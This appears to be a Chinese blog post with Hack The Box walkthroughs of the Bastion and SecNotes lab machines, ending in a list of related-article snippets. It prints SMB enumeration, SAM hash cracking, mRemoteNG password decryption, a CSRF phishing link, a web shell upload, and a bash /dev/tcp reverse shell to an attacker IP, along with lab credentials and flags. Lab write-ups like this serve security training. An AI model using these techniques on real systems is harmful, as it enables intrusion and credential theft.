HTB-oscplike-Bastian+Secnotes

最新推荐文章于 2024-05-15 20:54:03 发布
最新推荐文章于 2024-05-15 20:54:03 发布
阅读量2.3k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124132362
版权

HTB-oscplike-Bastian+Secnotes

Bastian

easy难度的bastion 靶机IP 10.10.10.134

sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open tcpwrapped

smbclient -N -L 10.10.10.134 看到
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
smbclient -N \\10.10.10.134\Backups 里面有note.txt和WindowsImageBackup
note.txt打开看到
Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

不要整个拿过去 那就挂载吧
mount -t cifs //10.10.10.134/backups /tmp -o user=,password=
进去找到两个vhd虚拟磁盘
guestmount --add /tmp/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /temp/
进去可以看到C:\Windows\System32\config\SAM
爆破得到L4mpje/bureaulampje
ssh连进去

翻来翻去翻到一个文件夹C:\Program Files (x86)\mremoteng
google了一下发现在 c:\users%user%\appdata\roaming\mremoteng\confcons.xml里会有密码的信息泄露
在里面找到Username=“Administrator” Domain=“” Password=“aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==”

这串密码不是base64 但是github上有工具专门解
解出来密码是 thXLHM96BeKL0ER2 连上去就行
742aa8e404a88fe208d375dc4da33446
44eab37c86624604149920f4ce5b98d1
请添加图片描述

Secnotes

medium难度的SecNotes 靶机IP 10.10.10.97

sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.10.97
80/tcp open http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0

80里可以注册登录 里面发现有改密码和contact us 栏目
请添加图片描述

一开始我以为又是xss的利用 测试发现不是 但发送的如果是链接会被点击
那就简单了 根据主页上面有一行

Please contact tyler@secnotes.htb using the contact link below with any questions.

以及改密码抓包的参数 构造
http://10.10.10.97/change_pass.php?password=111111&confirm_password=111111&submit=submit
在contact里发给他 钓鱼得到 tyler/111111 登录进去翻到
\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

smbclient -U tyler \\secnotes.htb\new-site 上去
上去发现我们到的是8808端口下 上传cmd.php然后连上去
拿到user的flag 9549d5f2555c5b06a263fd48e19fd3ec

同目录发现有一个很奇怪的bash.lnk 一个windows机子带个bash很不正常
同时根目录还有个ubantu.zip 那么会不会有可执行的bash呢
where.exe /R c:\ bash.* 看到有两个exe 随便挑一个

c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
bash.exe -c ‘bash -i >& /dev/tcp/10.10.14.19/7890 0>&1’

进去后是一个root的linux环境 但是root下面什么都没有
ls -la看到一个.bash_history 打开看到
smbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\127.0.0.1\c$

直接连上去 都可以访问了 拿到flag
24187aa73e316d6341056bff327ca8e7

请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
Oracle 加密代码
qdj_2002的专栏
02-20 365
Oracle 中提供了Wrap工具进行代码加密,但是其不能还原,所以在加密之后需要将原始代码管理好,以免丢失!具体操作如下 wrap iname=D:/oracle/unWrapFile.sql oname=d:/oracle/wrapFile.pbl 其中iname和oname分别指定了加密的源文件和加密后的文件。 
HTB-oscplike-Object
m0_53302733的博客
04-21 3179
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
HTB-Bastion
最新发布
2201_75378806的博客
05-15 924
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
HTB-oscplike-Forest
m0_53302733的博客
04-10 2512
HTB-oscplike-Forest easy难度的forest 靶机IP 10.10.10.161 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z) 135/tcp
oscp——HTB——Optimum
王嘟嘟的博客
05-25 518
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
oscp——HTB—— Lame
王嘟嘟的博客
04-13 589
0x00 前言 vulnhub下载,搞环境搞的人心累,还不如试试HTB~ 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。 0x02 usershell and rootshell 我是做完之后回来写的,这里可以直接拿到两个flag 看到samba,拿msf 看一下版本 use auxiliary/scanner/smb/s...
oscp——HTB——Popcorn
王嘟嘟的博客
05-09 528
0x00 前言 难度 入门2级 0x01 信息收集 这里开放了22和80 0x02 Web——Webshell 看到这里是一个test,果断扫目录。 拿到目录: http://10.10.10.6/test http://10.10.10.6/torrent/ 先看一下test,phpinfo的界面 访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号 然后上传一个torrent 然后这里上传成功 这里上传文件,并使用burp拦截,并且修改
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
oscp——HTB——Beep
王嘟嘟的博客
05-09 491
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Rootshell 先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入 搜索一下Elastix的历史漏洞 首先看到了一个LFI的洞,下载下来,然后看一下 利用payload进行测试 这里找到了一个admin的密码 jEhdIekWmdjE 可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。 ...
oscp——htb——Mirai
王嘟嘟的博客
08-06 511
0x00 前言 这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题 0x01 信息收集
oscp——htb——Joker
王嘟嘟的博客
07-14 515
0x00 前言 这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。 0x01 信息收集 0x02 Web——Webshell 这里有一个3128开放,我找了历史漏洞但是都没有利用成功。 最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。 但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。 使用tftp进行连接 然后获取squid相关内容 /etc/squid/squid.conf /etc/squ
oscp——htb——Lazy
热门推荐
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
oscp——htb——Europa
王嘟嘟的博客
07-27 329
0x00 前言 0x01 信息收集 0x02 Web——Webshell
oscp——HTB——Legacy
王嘟嘟的博客
04-26 526
0x00 前言 乘着网好,赶紧做一做。 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规上nmap 看了一下目标版本,这里是2003 看到这里看到445以及版本,永恒之蓝没得跑了。 0x02 usershell and rootshell 可以直接开启msf,进行搜索 search smb 获取到shell 首先是找到user.txt 然后找到root.txt ...
oscp——htb——Bank
王嘟嘟的博客
07-21 345
0x00 前言 0x01 信息收集 0x02 Web——Webshell 这里看到53 DNS开放,而且web是apache默认页面,应该是要进行一个域名的绑定。 这里为什么是bank.htb,我也不知道为啥,找了半天也没找到缘由。 10.10.10.29 bank.htb www.bank.htb ns.bank.htb chris.bank.htb 这里跑目录发现一个http://bank.htb/support.php 访问一下,将302改为200 这里从burp来看可以看的很清楚 这里上
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作才能解决这个挑战。具体的解题步骤我无法提供,因为每个挑战都设计得非常独特,需要你自己进行思考和尝试。 如果你对Hack The Box平台或CozyHosting有进一步的问题,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值